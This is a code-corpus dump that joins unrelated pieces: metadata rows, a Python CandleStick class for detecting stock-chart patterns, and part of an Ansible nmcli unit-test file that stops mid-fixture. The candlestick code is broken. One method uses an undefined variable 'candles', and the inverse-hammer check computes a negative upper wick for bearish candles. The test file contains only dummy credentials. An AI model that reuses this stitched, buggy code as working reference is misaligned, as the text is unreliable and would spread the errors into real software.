] | 84 | 2020-05-05T13:04:38.000Z | 2021-12-21T01:51:42.000Z | lib/stolgo/candlestick.py | mhn0497/stolgo | 8f697da41f9684bc36a94cce7a1b4824334f012a | [
"MIT"
] | 38 | 2020-05-05T17:05:26.000Z | 2022-02-25T15:30:16.000Z | from stolgo.exception import BadDataError
class CandleStick:
def is_bearish_candle(self,candle):
return candle["Close"] < candle["Open"]
def is_bullish_candle(self,candle):
return candle["Close"] > candle["Open"]
def is_bullish_engulfing(self,candles,pos=-1):
if candles.shape[0] < 2:
raise BadDataError("Minimun two candles require")
curr_candle = candles.iloc[pos]
prev_candle = candles.iloc[pos-1]
#check for pattern
if (self.is_bearish_candle(prev_candle)\
and curr_candle["Close"] > prev_candle["Open"] \
and curr_candle["Open"] <prev_candle["Close"]):
return True
return False
def is_hammer_candle(self,candle,pos=-1,lower_wick = 0.6, body = 0.2, upper_wick = 0.2):
curr_candle = candle.iloc[pos]
if candles.shape[0] < 1:
raise BadDataError("Minimun one candles require")
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
candle_body = curr_candle["Close"] - curr_candle["Open"]
if candle_body <= body * candle_length and candle_upper_wick <= upper_wick * candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_upper_wick = curr_candle["High"]-curr_candle["Open"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
candle_body = curr_candle["Open"] - curr_candle["Close"]
if candle_body <= body * candle_length and candle_upper_wick <= upper_wick * candle_length:
return True
return False
def is_inverse_hammer_candle(self,candle,pos=-1,lower_wick = 0.2, body = 0.2, upper_wick = 0.6):
curr_candle = candle.iloc[pos]
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_body = curr_candle["Close"] - curr_candle["Open"]
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_lower_wick <= lower_wick * candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_body = curr_candle["Open"] - curr_candle["Close"]
candle_upper_wick = curr_candle["Open"]-curr_candle["High"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_lower_wick <= lower_wick * candle_length:
return True
return False
def is_doji_candle(self,candle,pos=-1,lower_wick = 0.4, body = 0.02, upper_wick = 0.4):
curr_candle = candle.iloc[pos]
candle_length = curr_candle["High"] - curr_candle["Low"]
if self.is_bullish_candle(curr_candle):
candle_body = curr_candle["Close"] - curr_candle["Open"]
candle_upper_wick = curr_candle["High"]-curr_candle["Close"]
candle_lower_wick = curr_candle["Open"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_upper_wick >= upper_wick*candle_length and candle_lower_wick >= lower_wick*candle_length:
return True
elif self.is_bearish_candle(curr_candle):
candle_body = curr_candle["Open"] - curr_candle["Close"]
candle_upper_wick = curr_candle["High"]-curr_candle["Open"]
candle_lower_wick = curr_candle["Close"]-curr_candle["Low"]
if candle_body <= body * candle_length and candle_upper_wick >= upper_wick*candle_length and candle_lower_wick >= lower_wick*candle_length:
return True
return False | 52.693333 | 151 | 0.643978 | 511 | 3,952 | 4.651663 | 0.101761 | 0.227177 | 0.082036 | 0.060581 | 0.831721 | 0.822045 | 0.791754 | 0.791754 | 0.746319 | 0.707194 | 0 | 0.009409 | 0.246964 | 3,952 | 75 | 152 | 52.693333 | 0.789315 | 0.004302 | 0 | 0.69697 | 0 | 0 | 0.066328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.015152 | 0.030303 | 0.318182 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c732c1e61d070ba6f5319cfc49bad07bf0c1ffef | 83,144 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/net_tools/test_nmcli.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # Copyright: (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils.common.text.converters import to_text
from ansible_collections.community.general.plugins.modules.net_tools import nmcli
pytestmark = pytest.mark.usefixtures('patch_ansible_module')
TESTCASE_CONNECTION = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bond',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bond-slave',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'bridge',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'vlan',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'vxlan',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'gre',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'ipip',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'sit',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'dummy',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'gsm',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
]
TESTCASE_GENERIC = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'_ansible_check_mode': False,
},
]
TESTCASE_GENERIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_MODIFY_ROUTING_RULES = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'routing_rules4': ['priority 5 from 10.0.0.0/24 table 5000', 'priority 10 from 10.0.1.0/24 table 5001'],
'state': 'present',
'_ansible_check_mode': False,
},
]
TESTCASE_GENERIC_MODIFY_ROUTING_RULES_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.routing-rules: priority 5 from 10.0.0.0/24 table 5000, priority 10 from 10.0.1.0/24 table 5001
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_DNS4_SEARCH = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'dns4_search': 'search.redhat.com',
'dns6_search': 'search6.redhat.com',
'_ansible_check_mode': False,
}
]
TESTCASE_GENERIC_DNS4_SEARCH_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.dns-search: search.redhat.com
ipv4.may-fail: yes
ipv6.dns-search: search6.redhat.com
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_ZONE = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'zone': 'external',
'_ansible_check_mode': False,
}
]
TESTCASE_GENERIC_ZONE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
connection.zone: external
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_BOND = [
{
'type': 'bond',
'conn_name': 'non_existent_nw_device',
'ifname': 'bond_non_existant',
'mode': 'active-backup',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'primary': 'non_existent_primary',
'_ansible_check_mode': False,
}
]
TESTCASE_BOND_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: bond_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
bond.options: mode=active-backup,primary=non_existent_primary
"""
TESTCASE_BRIDGE = [
{
'type': 'bridge',
'conn_name': 'non_existent_nw_device',
'ifname': 'br0_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'mac': '52:54:00:ab:cd:ef',
'maxage': 100,
'stp': True,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_BRIDGE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: br0_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
bridge.mac-address: 52:54:00:AB:CD:EF
bridge.stp: yes
bridge.max-age: 100
bridge.ageing-time: 300
bridge.hello-time: 2
bridge.priority: 128
bridge.forward-delay: 15
"""
TESTCASE_BRIDGE_SLAVE = [
{
'type': 'bridge-slave',
'conn_name': 'non_existent_nw_device',
'ifname': 'br0_non_existant',
'path_cost': 100,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_BRIDGE_SLAVE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: br0_non_existant
connection.autoconnect: yes
connection.slave-type: bridge
ipv4.never-default: no
bridge-port.path-cost: 100
bridge-port.hairpin-mode: yes
bridge-port.priority: 32
"""
TESTCASE_TEAM = [
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'ifname': 'team0_non_existant',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: team0_non_existant
connection.autoconnect: yes
connection.type: team
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
team.runner: roundrobin
"""
TESTCASE_TEAM_HWADDR_POLICY_FAILS = [
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'ifname': 'team0_non_existant',
'runner_hwaddr_policy': 'by_active',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SLAVE = [
{
'type': 'team-slave',
'conn_name': 'non_existent_nw_slaved_device',
'ifname': 'generic_slaved_non_existant',
'master': 'team0_non_existant',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SLAVE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_slaved_device
connection.interface-name: generic_slaved_non_existant
connection.autoconnect: yes
connection.master: team0_non_existant
connection.slave-type: team
802-3-ethernet.mtu: auto
"""
TESTCASE_VLAN = [
{
'type': 'vlan',
'conn_name': 'non_existent_nw_device',
'ifname': 'vlan_not_exists',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'vlanid': 10,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_VLAN_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: vlan_not_exists
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
vlan.id: 10
"""
TESTCASE_VXLAN = [
{
'type': 'vxlan',
'conn_name': 'non_existent_nw_device',
'ifname': 'vxlan-existent_nw_device',
'vxlan_id': 11,
'vxlan_local': '192.168.225.5',
'vxlan_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_VXLAN_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: vxlan-existent_nw_device
connection.autoconnect: yes
vxlan.id: 11
vxlan.local: 192.168.225.5
vxlan.remote: 192.168.225.6
"""
TESTCASE_GRE = [
{
'type': 'gre',
'conn_name': 'non_existent_nw_device',
'ifname': 'gre-existent_nw_device',
'ip_tunnel_dev': 'non_existent_gre_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'ip_tunnel_input_key': '1',
'ip_tunnel_output_key': '2',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_GRE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: gre-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: gre
ip-tunnel.parent: non_existent_gre_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
ip-tunnel.input-key: 1
ip-tunnel.output-key: 2
"""
TESTCASE_IPIP = [
{
'type': 'ipip',
'conn_name': 'non_existent_nw_device',
'ifname': 'ipip-existent_nw_device',
'ip_tunnel_dev': 'non_existent_ipip_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_IPIP_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ipip-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: ipip
ip-tunnel.parent: non_existent_ipip_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
"""
TESTCASE_SIT = [
{
'type': 'sit',
'conn_name': 'non_existent_nw_device',
'ifname': 'sit-existent_nw_device',
'ip_tunnel_dev': 'non_existent_sit_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_SIT_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: sit-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: sit
ip-tunnel.parent: non_existent_sit_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
"""
TESTCASE_ETHERNET_DHCP = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'ifname': 'ethernet_non_existant',
'dhcp_client_id': '00:11:22:AA:BB:CC:DD',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: auto
ipv4.dhcp-client-id: 00:11:22:AA:BB:CC:DD
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_ETHERNET_STATIC = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'ifname': 'ethernet_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'dns4': ['1.1.1.1', '8.8.8.8'],
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_ETHERNET_STATIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_ETHERNET_STATIC_IP6_ADDRESS_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv6.method: manual
ipv6.addresses: 2001:db8::cafe/128
ipv6.gateway: 2001:db8::cafa
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.never-default: no
ipv6.may-fail: yes
ipv6.dns: 2001:4860:4860::8888,2001:4860:4860::8844
ipv4.method: disabled
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
"""
TESTCASE_WIRELESS = [
{
'type': 'wifi',
'conn_name': 'non_existent_nw_device',
'ifname': 'wireless_non_existant',
'ip4': '10.10.10.10/24',
'ssid': 'Brittany',
'wifi': {
'hidden': True,
'mode': 'ap',
},
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_SECURE_WIRELESS = [
{
'type': 'wifi',
'conn_name': 'non_existent_nw_device',
'ifname': 'wireless_non_existant',
'ip4': '10.10.10.10/24',
'ssid': 'Brittany',
'wifi_sec': {
'key-mgmt': 'wpa-psk',
'psk': 'VERY_SECURE_PASSWORD',
},
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT = """\
802-11-wireless.ssid: --
802-11-wireless.mode: infrastructure
802-11-wireless.band: --
802-11-wireless.channel: 0
802-11-wireless.bssid: --
802-11-wireless.rate: 0
802-11-wireless.tx-power: 0
802-11-wireless.mac-address: --
802-11-wireless.cloned-mac-address: --
802-11-wireless.generate-mac-address-mask:--
802-11-wireless.mac-address-blacklist: --
802-11-wireless.mac-address-randomization:default
802-11-wireless.mtu: auto
802-11-wireless.seen-bssids: --
802-11-wireless.hidden: no
802-11-wireless.powersave: 0 (default)
802-11-wireless.wake-on-wlan: 0x1 (default)
802-11-wireless.ap-isolation: -1 (default)
"""
TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT = \
TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT + """\
802-11-wireless-security.key-mgmt: --
802-11-wireless-security.wep-tx-keyidx: 0
802-11-wireless-security.auth-alg: --
802-11-wireless-security.proto: --
802-11-wireless-security.pairwise: --
802-11-wireless-security.group: --
802-11-wireless-security.pmf: 0 (default)
802-11-wireless-security.leap-username: --
802-11-wireless-security.wep-key0: --
802-11-wireless-security.wep-key1: --
802-11-wireless-security.wep-key2: --
802-11-wireless-security.wep-key3: --
802-11-wireless-security.wep-key-flags: 0 (none)
802-11-wireless-security.wep-key-type: unknown
802-11-wireless-security.psk: testingtestingtesting
802-11-wireless-security.psk-flags: 0 (none)
802-11-wireless-security.leap-password: --
802-11-wireless-security.leap-password-flags:0 (none)
802-11-wireless-security.wps-method: 0x0 (default)
802-11-wireless-security.fils: 0 (default)
"""
TESTCASE_DUMMY_STATIC = [
{
'type': 'dummy',
'conn_name': 'non_existent_nw_device',
'ifname': 'dummy_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'dns4': ['1.1.1.1', '8.8.8.8'],
'ip6': '2001:db8::1/128',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_DUMMY_STATIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_DUMMY_STATIC_WITHOUT_MTU_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_DUMMY_STATIC_WITH_CUSTOM_MTU_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: 1500
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_GSM = [
{
'type': 'gsm',
'conn_name': 'non_existent_nw_device',
'ifname': 'gsm_non_existant',
'gsm': {
'apn': 'internet.telekom',
'username': 't-mobile',
'password': 'tm',
'pin': '1234',
},
'method4': 'auto',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_GSM_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.type: gsm
connection.interface-name: gsm_non_existant
connection.autoconnect: yes
ipv4.method: auto
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
gsm.auto-config: no
gsm.number: --
gsm.username: t-mobile
gsm.password: tm
gsm.password-flags: 0 (none)
gsm.apn: "internet.telekom"
gsm.network-id: --
gsm.pin: 1234
gsm.pin-flags: 0 (none)
gsm.home-only: no
gsm.device-id: --
gsm.sim-id: --
gsm.sim-operator-id: --
gsm.mtu: auto
"""
def mocker_set(mocker,
               connection_exists=False,
               execute_return=(0, "", ""),
               execute_side_effect=None,
               changed_return=None):
    """Install the common nmcli mocks for a test.

    Patches AnsibleModule.get_bin_path to a fixed nmcli path, forces
    Nmcli.connection_exists to report *connection_exists*, and wires
    Nmcli.execute_command with the given return value and/or side-effect
    sequence.  When *changed_return* is supplied, Nmcli.is_connection_changed
    is patched to report it as well.
    """
    mocker.patch(
        'ansible.module_utils.basic.AnsibleModule.get_bin_path',
        return_value='/usr/bin/nmcli',
    )
    mocker.patch.object(
        nmcli.Nmcli, 'connection_exists',
        return_value=connection_exists,
    )
    command_mock = mocker.patch.object(nmcli.Nmcli, 'execute_command')
    if execute_return:
        command_mock.return_value = execute_return
    if execute_side_effect:
        command_mock.side_effect = execute_side_effect
    if changed_return:
        mocker.patch.object(
            nmcli.Nmcli, 'is_connection_changed',
            return_value=changed_return,
        )
@pytest.fixture
def mocked_generic_connection_create(mocker):
    # No pre-existing connection (connection_exists defaults to False):
    # exercises the 'con add' code path.
    mocker_set(mocker)


@pytest.fixture
def mocked_connection_exists(mocker):
    # Connection already present; every nmcli call succeeds with empty output.
    mocker_set(mocker, connection_exists=True)


@pytest.fixture
def mocked_generic_connection_modify(mocker):
    # Existing connection reported as changed: exercises the 'con modify' path.
    mocker_set(mocker,
               connection_exists=True,
               changed_return=(True, dict()))


@pytest.fixture
def mocked_generic_connection_unchanged(mocker):
    # Existing connection whose 'con show' output already matches
    # TESTCASE_GENERIC, so the module should report changed=False.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GENERIC_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_generic_connection_modify_routing_rules(mocker):
    # Bug fix: this fixture was previously also named
    # 'mocked_generic_connection_unchanged', shadowing the fixture defined
    # just above it and silently substituting the routing-rules show output
    # into every test that requested the generic "unchanged" fixture.
    # Renamed so both fixtures remain usable and unambiguous.
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GENERIC_MODIFY_ROUTING_RULES_SHOW_OUTPUT, ""))
# Fixtures below all follow the same pattern: the connection exists and
# `nmcli con show` returns output that already matches the corresponding
# TESTCASE_* parameters, so the module should report changed=False.

@pytest.fixture
def mocked_generic_connection_dns_search_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GENERIC_DNS4_SEARCH_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_generic_connection_zone_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GENERIC_ZONE_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_bond_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_BOND_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_bridge_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_BRIDGE_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_bridge_slave_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_BRIDGE_SLAVE_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_team_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_TEAM_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_team_slave_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_TEAM_SLAVE_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_vlan_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_VLAN_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_vxlan_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_VXLAN_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_gre_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_GRE_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_ipip_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_IPIP_SHOW_OUTPUT, ""))


@pytest.fixture
def mocked_sit_connection_unchanged(mocker):
    mocker_set(mocker,
               connection_exists=True,
               execute_return=(0, TESTCASE_SIT_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ethernet_connection_unchanged(mocker):
    # Bug fix: execute_return must carry the textual `nmcli con show` output.
    # The original passed TESTCASE_ETHERNET_DHCP -- the module-parameter list
    # (a list of dicts) -- which Nmcli could never parse as command stdout.
    # Every sibling fixture passes the corresponding *_SHOW_OUTPUT string.
    mocker_set(mocker,
               connection_exists=True,
